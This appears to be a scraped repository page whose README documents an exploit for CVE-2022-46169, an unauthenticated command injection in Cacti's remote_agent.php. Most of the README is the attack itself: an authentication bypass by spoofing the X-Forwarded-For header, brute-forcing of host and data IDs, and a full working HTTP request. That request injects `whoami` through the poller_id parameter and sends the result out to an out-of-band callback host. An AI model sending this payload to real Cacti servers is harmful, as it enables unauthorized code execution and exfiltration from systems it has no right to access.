Enable build support by adding .buildspec.yml
| documentation/modules/exploit/linux/http | Loading last commit info... | |
| modules/exploits/linux/http | ||
| README.md |
README.md
CVE-2022-46169
CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.
Auth Bypass
Add X-Forwarded-For header to bypass authentication, note that its value is not a fixed value.
Brute Force
Use Burp Intruder to fuzz test the values of host_id and local_data_ids.
RCE
The point of command injection is the poller_id parameter.
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1
